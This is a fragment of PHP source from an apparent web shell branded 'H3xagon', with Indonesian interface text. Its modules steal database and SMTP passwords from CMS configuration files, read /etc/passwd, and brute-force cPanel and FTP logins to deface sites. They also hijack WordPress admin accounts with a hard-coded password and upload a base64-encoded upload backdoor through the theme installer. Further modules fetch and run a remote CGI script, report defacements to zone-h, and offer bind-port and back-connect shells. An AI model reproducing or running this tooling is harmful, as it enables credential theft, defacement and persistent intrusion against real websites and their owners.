					$pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."
";
				} elseif(preg_match("/JConfig|joomla/", $ambil)) {
					$pass .= ambilkata($ambil,"password = '","'")."
";
				} elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
					$pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."
";
				} elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
					$pass .= ambilkata($ambil,'password = "','"')."
";
				} elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
					$pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."
";
				} elseif(preg_match("/^[client]$/", $ambil)) {
					preg_match("/password=(.*?)/", $ambil, $pass1);
					if(preg_match('/"/', $pass1[1])) {
						$pass1[1] = str_replace('"', "", $pass1[1]);
						$pass .= $pass1[1]."
";
					} else {
						$pass .= $pass1[1]."
";
					}
				} elseif(preg_match("/cc_encryption_hash/", $ambil)) {
					$pass .= ambilkata($ambil,"db_password = '","'")."
";
				}
			}
			echo $pass;
		}
		$cp_pass = cp_pass($dir);
		echo $cp_pass;
		echo "</textarea><br>
		<input type='submit' name='crack' style='width: 450px;' value='Crack'>
		</form>
		<span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/h3xagon_kill )</span><br></center>";
	}
} elseif($_GET['do'] == 'cpftp_auto') {
	if($_POST['crack']) {
		$usercp = explode("
", $_POST['user_cp']);
		$passcp = explode("
", $_POST['pass_cp']);
		$i = 0;
		foreach($usercp as $ucp) {
			foreach($passcp as $pcp) {
				if(@mysql_connect('localhost', $ucp, $pcp)) {
					if($_SESSION[$ucp] && $_SESSION[$pcp]) {
					} else {
						$_SESSION[$ucp] = "1";
						$_SESSION[$pcp] = "1";
						if($ucp == '' || $pcp == '') {
							//
						} else {
							echo "[+] username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
							$ftp_conn = ftp_connect($ip);
							$ftp_login = ftp_login($ftp_conn, $ucp, $pcp);
							if((!$ftp_login) || (!$ftp_conn)) {
								echo "[+] <font color=red>Login Gagal</font><br><br>";
							} else {
								echo "[+] <font color=lime>Login Sukses</font><br>";
								$fi = htmlspecialchars($_POST['file_deface']);
								$deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);
								if($deface) {
									$i++;
									echo "[+] <font color=lime>Deface Sukses</font><br>";
									if(function_exists('posix_getpwuid')) {
										$domain_cp = file_get_contents("/etc/named.conf");	
										if($domain_cp == '') {
											echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
										} else {
											preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
											foreach($domains_cp[1] as $dj) {
												$user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
												$user_cp_url = $user_cp_url['name'];
												if($user_cp_url == $ucp) {
													echo "[+] <a href='http://$dj/$fi' target='_blank'>http://$dj/$fi</a><br><br>";
													break;
												}
											}
										}
									} else {
										echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
									}
								} else {
									echo "[-] <font color=red>Deface Gagal</font><br><br>";
								}
							}
							//echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
						}
					}
				}
			}
		}
		if($i == 0) {
		} else {
			echo "<br>sukses deface ".$i." Cpanel by <font color=lime>H3xagon.</font>";
		}
	} else {
		echo "<center>
		<form method='post'>
		Filename: <br>
		<input type='text' name='file_deface' placeholder='index.php' value='index.php' style='width: 450px;'><br>
		Deface Page: <br>
		<input type='text' name='deface' placeholder='http://www.web-yang-udah-di-deface.com/filemu.php' style='width: 450px;'><br>
		USER: <br>
		<textarea style='width: 450px; height: 150px;' name='user_cp'>";
		$_usercp = fopen("/etc/passwd","r");
		while($getu = fgets($_usercp)) {
			if($getu == '' || !$_usercp) {
				echo "<font color=red>Can't read /etc/passwd</font>";
			} else {
				preg_match_all("/(.*?):x:/", $getu, $u);
				foreach($u[1] as $user_cp) {
						if(is_dir("/home/$user_cp/public_html")) {
							echo "$user_cp
";
					}
				}
			}
		}
		echo "</textarea><br>
		PASS: <br>
		<textarea style='width: 450px; height: 200px;' name='pass_cp'>";
		function cp_pass($dir) {
			$pass = "";
			$dira = scandir($dir);
			foreach($dira as $dirb) {
				if(!is_file("$dir/$dirb")) continue;
				$ambil = file_get_contents("$dir/$dirb");
				if(preg_match("/WordPress/", $ambil)) {
					$pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."
";
				} elseif(preg_match("/JConfig|joomla/", $ambil)) {
					$pass .= ambilkata($ambil,"password = '","'")."
";
				} elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
					$pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."
";
				} elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
					$pass .= ambilkata($ambil,'password = "','"')."
";
				} elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
					$pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."
";
				} elseif(preg_match("/client/", $ambil)) {
					preg_match("/password=(.*)/", $ambil, $pass1);
					if(preg_match('/"/', $pass1[1])) {
						$pass1[1] = str_replace('"', "", $pass1[1]);
						$pass .= $pass1[1]."
";
					}
				} elseif(preg_match("/cc_encryption_hash/", $ambil)) {
					$pass .= ambilkata($ambil,"db_password = '","'")."
";
				}
			}
			echo $pass;
		}
		$cp_pass = cp_pass($dir);
		echo $cp_pass;
		echo "</textarea><br>
		<input type='submit' name='crack' style='width: 450px;' value='Hajar'>
		</form>
		<span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/h3xagon_kill )</span><br></center>";
	}
} elseif($_GET['do'] == 'smtp') {
	echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
	function scj($dir) {
		$dira = scandir($dir);
		foreach($dira as $dirb) {
			if(!is_file("$dir/$dirb")) continue;
			$ambil = file_get_contents("$dir/$dirb");
			$ambil = str_replace("$", "", $ambil);
			if(preg_match("/JConfig|joomla/", $ambil)) {
				$smtp_host = ambilkata($ambil,"smtphost = '","'");
				$smtp_auth = ambilkata($ambil,"smtpauth = '","'");
				$smtp_user = ambilkata($ambil,"smtpuser = '","'");
				$smtp_pass = ambilkata($ambil,"smtppass = '","'");
				$smtp_port = ambilkata($ambil,"smtpport = '","'");
				$smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
				echo "SMTP Host: <font color=lime>$smtp_host</font><br>";
				echo "SMTP port: <font color=lime>$smtp_port</font><br>";
				echo "SMTP user: <font color=lime>$smtp_user</font><br>";
				echo "SMTP pass: <font color=lime>$smtp_pass</font><br>";
				echo "SMTP auth: <font color=lime>$smtp_auth</font><br>";
				echo "SMTP secure: <font color=lime>$smtp_secure</font><br><br>";
			}
		}
	}
	$smpt_hunter = scj($dir);
	echo $smpt_hunter;
} elseif($_GET['do'] == 'auto_wp') {
	if($_POST['hajar']) {
		$title = htmlspecialchars($_POST['new_title']);
		$pn_title = str_replace(" ", "-", $title);
		if($_POST['cek_edit'] == "Y") {
			$script = $_POST['edit_content'];
		} else {
			$script = $title;
		}
		$conf = $_POST['config_dir'];
		$scan_conf = scandir($conf);
		foreach($scan_conf as $file_conf) {
			if(!is_file("$conf/$file_conf")) continue;
			$config = file_get_contents("$conf/$file_conf");
			if(preg_match("/WordPress/", $config)) {
				$dbhost = ambilkata($config,"DB_HOST', '","'");
				$dbuser = ambilkata($config,"DB_USER', '","'");
				$dbpass = ambilkata($config,"DB_PASSWORD', '","'");
				$dbname = ambilkata($config,"DB_NAME', '","'");
				$dbprefix = ambilkata($config,"table_prefix  = '","'");
				$prefix = $dbprefix."posts";
				$option = $dbprefix."options";
				$conn = mysql_connect($dbhost,$dbuser,$dbpass);
				$db = mysql_select_db($dbname);
				$q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
				$result = mysql_fetch_array($q);
				$id = $result[ID];
				$q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
				$result2 = mysql_fetch_array($q2);
				$target = $result2[option_value];
				$update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
				$update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
				echo "<div style='margin: 5px auto;'>";
				if($target == '') {
					echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
				} else {
					echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
				}
				if(!$update OR !$conn OR !$db) {
					echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
				} else {
					echo "<font color=lime>sukses di ganti.</font><br>";
				}
				echo "</div>";
				mysql_close($conn);
			}
		}
	} else {
		echo "<center>
		<h1>Auto Edit Title+Content WordPress</h1>
		<form method='post'>
		DIR Config: <br>
		<input type='text' size='50' name='config_dir' value='$dir'><br><br>
		Set Title: <br>
		<input type='text' name='new_title' value='Hacked by H3xagon' placeholder='New Title'><br><br>
		Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
		<span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
		<textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
		<input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
		</form>
		<span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/h3xagon_kill )</span><br>
		";
	}
} elseif($_GET['do'] == 'zoneh') {
	if($_POST['submit']) {
		$domain = explode("
", $_POST['url']);
		$nick =  $_POST['nick'];
		echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
		echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
		function zoneh($url,$nick) {
			$ch = curl_init("http://www.zone-h.com/notify/single");
				  curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
				  curl_setopt($ch, CURLOPT_POST, true);
				  curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
			return curl_exec($ch);
				  curl_close($ch);
		}
		foreach($domain as $url) {
			$zoneh = zoneh($url,$nick);
			if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
				echo "$url -> <font color=lime>OK</font><br>";
			} else {
				echo "$url -> <font color=red>ERROR</font><br>";
			}
		}
	} else {
		echo "<center><form method='post'>
		<u>Defacer</u>: <br>
		<input type='text' name='nick' size='50' value='H3xagon'><br>
		<u>Domains</u>: <br>
		<textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
		<input type='submit' name='submit' value='Submit' style='width: 450px;'>
		</form>";
	}
	echo "</center>";
} elseif($_GET['do'] == 'cgi') {
	$cgi_dir = mkdir('h3xagon_cgikill', 0755);
	$file_cgi = "h3xagon_cgikill/cgi.izo";
	$isi_htcgi = "AddHandler cgi-script .izo";
	$htcgi = fopen(".htaccess", "w");
	$cgi_script = file_get_contents("http://pastebin.com/raw.php?i=XTUFfJLg");
	$cgi = fopen($file_cgi, "w");
	fwrite($cgi, $cgi_script);
	fwrite($htcgi, $isi_htcgi);
	chmod($file_cgi, 0755);
	echo "<iframe src='h3xagon_cgikill/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
} elseif($_GET['do'] == 'fake_root') {
	ob_start();
	$cwd = getcwd();
	$ambil_user = explode("/", $cwd);
	$user = $ambil_user[2];
	if($_POST['reverse']) {
		$site = explode("
", $_POST['url']);
		$file = $_POST['file'];
		foreach($site as $url) {
			$cek = getsource("$url/~$user/$file");
			if(preg_match("/hacked/i", $cek)) {
				echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=lime>Fake Root!</font><br>";
			}
		}
	} else {
		echo "<center><form method='post'>
		Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
		User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
		Domain: <br>
		<textarea style='width: 450px; height: 250px;' name='url'>";
		reverse($_SERVER['HTTP_HOST']);
		echo "</textarea><br>
		<input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
		</form><br>
		NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
	}
} elseif($_GET['do'] == 'adminer') {
	$full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
	function adminer($url, $isi) {
		$fp = fopen($isi, "w");
		$ch = curl_init();
		 	  curl_setopt($ch, CURLOPT_URL, $url);
		 	  curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
		 	  curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
		 	  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
		   	  curl_setopt($ch, CURLOPT_FILE, $fp);
		return curl_exec($ch);
		   	  curl_close($ch);
		fclose($fp);
		ob_flush();
		flush();
	}
	if(file_exists('adminer.php')) {
		echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
	} else {
		if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
			echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
		} else {
			echo "<center><font color=red>gagal buat file adminer</font></center>";
		}
	}
} elseif($_GET['do'] == 'auto_dwp') {
	if($_POST['auto_deface_wp']) {
		function anucurl($sites) {
    		$ch = curl_init($sites);
	       		  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
	       		  curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
	       		  curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
	       		  curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
	       		  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
	       		  curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
	       		  curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
	       		  curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
	       		  curl_setopt($ch, CURLOPT_COOKIESESSION, true);
			$data = curl_exec($ch);
				  curl_close($ch);
			return $data;
		}
		function lohgin($cek, $web, $userr, $pass, $wp_submit) {
    		$post = array(
                   "log" => "$userr",
                   "pwd" => "$pass",
                   "rememberme" => "forever",
                   "wp-submit" => "$wp_submit",
                   "redirect_to" => "$web",
                   "testcookie" => "1",
                   );
			$ch = curl_init($cek);
				  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
				  curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
				  curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
				  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
				  curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
				  curl_setopt($ch, CURLOPT_POST, 1);
				  curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
				  curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
				  curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
				  curl_setopt($ch, CURLOPT_COOKIESESSION, true);
			$data = curl_exec($ch);
				  curl_close($ch);
			return $data;
		}
		$scan = $_POST['link_config'];
		$link_config = scandir($scan);
		$script = htmlspecialchars($_POST['script']);
		$user = "H3xagon";
		$pass = "dennyseptian123!!";
		$passx = md5($pass);
		foreach($link_config as $dir_config) {
			if(!is_file("$scan/$dir_config")) continue;
			$config = file_get_contents("$scan/$dir_config");
			if(preg_match("/WordPress/", $config)) {
				$dbhost = ambilkata($config,"DB_HOST', '","'");
				$dbuser = ambilkata($config,"DB_USER', '","'");
				$dbpass = ambilkata($config,"DB_PASSWORD', '","'");
				$dbname = ambilkata($config,"DB_NAME', '","'");
				$dbprefix = ambilkata($config,"table_prefix  = '","'");
				$prefix = $dbprefix."users";
				$option = $dbprefix."options";
				$conn = mysql_connect($dbhost,$dbuser,$dbpass);
				$db = mysql_select_db($dbname);
				$q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
				$result = mysql_fetch_array($q);
				$id = $result[ID];
				$q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
				$result2 = mysql_fetch_array($q2);
				$target = $result2[option_value];
				if($target == '') {					
					echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
				} else {
					echo "[+] $target <br>";
				}
				$update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
				if(!$conn OR !$db OR !$update) {
					echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
					mysql_close($conn);
				} else {
					$site = "$target/wp-login.php";
					$site2 = "$target/wp-admin/theme-install.php?upload";
					$b1 = anucurl($site2);
					$wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
					$b = lohgin($site, $site2, $user, $pass, $wp_sub);
					$anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
					$upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
					$www = "m.php";
					$fp5 = fopen($www,"w");
					fputs($fp5,$upload3);
					$post2 = array(
							"_wpnonce" => "$anu2",
							"_wp_http_referer" => "/wp-admin/theme-install.php?upload",
							"themezip" => "@$www",
							"install-theme-submit" => "Install Now",
							);
					$ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
						  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
						  curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
						  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
						  curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
						  curl_setopt($ch, CURLOPT_POST, 1);
						  curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
						  curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
						  curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
					      curl_setopt($ch, CURLOPT_COOKIESESSION, true);
					$data3 = curl_exec($ch);
						  curl_close($ch);
					$y = date("Y");
					$m = date("m");
					$namafile = "fr.php";
					$fpi = fopen($namafile,"w");
					fputs($fpi,$script);
					$ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
						   curl_setopt($ch6, CURLOPT_POST, true);
						   curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
						   curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
						   curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
	       		  		   curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
	       		  		   curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
					$postResult = curl_exec($ch6);
						   curl_close($ch6);
					$as = "$target/k.php";
					$bs = anucurl($as);
					if(preg_match("#$script#is", $bs)) {
            	       	echo "[+] <font color='lime'>berhasil mepes...</font><br>";
            	       	echo "[+] <a href='$as' target='_blank'>$as</a><br><br>"; 
            	        } else {
            	        echo "[-] <font color='red'>gagal mepes...</font><br>";
            	        echo "[!!] coba aja manual: <br>";
            	        echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
            	        echo "[+] username: <font color=lime>$user</font><br>";
            	        echo "[+] password: <font color=lime>$pass</font><br><br>";     
            	        }
            		mysql_close($conn);
				}
			}
		}
	} else {
		echo "<center><h1>WordPress Auto Deface</h1>
		<form method='post'>
		<input type='text' name='link_config' size='50' height='10' value='$dir'><br>
		<input type='text' name='script' height='10' size='50' placeholder='Hacked by H3xagon' required><br>
		<input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
		</form>
		<br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/h3xagon_kill )</span>
		</center>";
	}
} elseif($_GET['do'] == 'auto_dwp2') {
	if($_POST['auto_deface_wp']) {
		function anucurl($sites) {
    		$ch = curl_init($sites);
	       		  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
	       		  curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
	       		  curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
	       		  curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
	       		  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
	       		  curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
	       		  curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
	       		  curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
	       		  curl_setopt($ch, CURLOPT_COOKIESESSION,true);
			$data = curl_exec($ch);
				  curl_close($ch);
			return $data;
		}
		function lohgin($cek, $web, $userr, $pass, $wp_submit) {
    		$post = array(
                   "log" => "$userr",
                   "pwd" => "$pass",
                   "rememberme" => "forever",
                   "wp-submit" => "$wp_submit",
                   "redirect_to" => "$web",
                   "testcookie" => "1",
                   );
			$ch = curl_init($cek);
				  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
				  curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
				  curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
				  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
				  curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
				  curl_setopt($ch, CURLOPT_POST, 1);
				  curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
				  curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
				  curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
				  curl_setopt($ch, CURLOPT_COOKIESESSION, true);
			$data = curl_exec($ch);
				  curl_close($ch);
			return $data;
		}
		$link = explode("
", $_POST['link']);
		$script = htmlspecialchars($_POST['script']);
		$user = "H3xagon";
		$pass = "dennyseptian123!!";
		$passx = md5($pass);
		foreach($link as $dir_config) {
			$config = anucurl($dir_config);
			$dbhost = ambilkata($config,"DB_HOST', '","'");
			$dbuser = ambilkata($config,"DB_USER', '","'");
			$dbpass = ambilkata($config,"DB_PASSWORD', '","'");
			$dbname = ambilkata($config,"DB_NAME', '","'");
			$dbprefix = ambilkata($config,"table_prefix  = '","'");
			$prefix = $dbprefix."users";
			$option = $dbprefix."options";
			$conn = mysql_connect($dbhost,$dbuser,$dbpass);
			$db = mysql_select_db($dbname);
			$q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
			$result = mysql_fetch_array($q);
			$id = $result[ID];
			$q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
			$result2 = mysql_fetch_array($q2);
			$target = $result2[option_value];
			if($target == '') {					
				echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
			} else {
				echo "[+] $target <br>";
			}
			$update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
			if(!$conn OR !$db OR !$update) {
				echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
				mysql_close($conn);
			} else {
				$site = "$target/wp-login.php";
				$site2 = "$target/wp-admin/theme-install.php?upload";
				$b1 = anucurl($site2);
				$wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
				$b = lohgin($site, $site2, $user, $pass, $wp_sub);
				$anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
				$upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
				$www = "m.php";
				$fp5 = fopen($www,"w");
				fputs($fp5,$upload3);
				$post2 = array(
						"_wpnonce" => "$anu2",
						"_wp_http_referer" => "/wp-admin/theme-install.php?upload",
						"themezip" => "@$www",
						"install-theme-submit" => "Install Now",
						);
				$ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
					  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
					  curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
					  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
					  curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
					  curl_setopt($ch, CURLOPT_POST, 1);
					  curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
					  curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
					  curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
				      curl_setopt($ch, CURLOPT_COOKIESESSION, true);
				$data3 = curl_exec($ch);
					  curl_close($ch);
				$y = date("Y");
				$m = date("m");
				$namafile = "fr.php";
				$fpi = fopen($namafile,"w");
				fputs($fpi,$script);
				$ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
					   curl_setopt($ch6, CURLOPT_POST, true);
					   curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
					   curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
					   curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
	       		  	   curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
	       		 	   curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
				$postResult = curl_exec($ch6);
					   curl_close($ch6);
				$as = "$target/k.php";
				$bs = anucurl($as);
				if(preg_match("#$script#is", $bs)) {
                   	echo "[+] <font color='lime'>berhasil mepes...</font><br>";
                   	echo "[+] <a href='$as' target='_blank'>$as</a><br><br>"; 
                    } else {
                    echo "[-] <font color='red'>gagal mepes...</font><br>";
                    echo "[!!] coba aja manual: <br>";
                    echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
                    echo "[+] username: <font color=lime>$user</font><br>";
                    echo "[+] password: <font color=lime>$pass</font><br><br>";     
                    }
            	mysql_close($conn);
			}
		}
	} else {
		echo "<center><h1>WordPress Auto Deface V.2</h1>
		<form method='post'>
		Link Config: <br>
		<textarea name='link' placeholder='http://target.com/h3xagon_kill/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
		<input type='text' name='script' height='10' size='50' placeholder='Hacked by H3xagon' required><br>
		<input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
		</form></center>";
	}
} elseif($_GET['do'] == 'network') {
	echo "<form method='post'>
	<u>Bind Port:</u> <br>
	PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
	<input type='submit' name='sub_bp' value='>>'>
	</form>
	<form method='post'>
	<u>Back Connect:</u> <br>
	Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>&nbsp;&nbsp;
	PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
	<input type='submit' name='sub_bc' value='>>'>
	</form>";
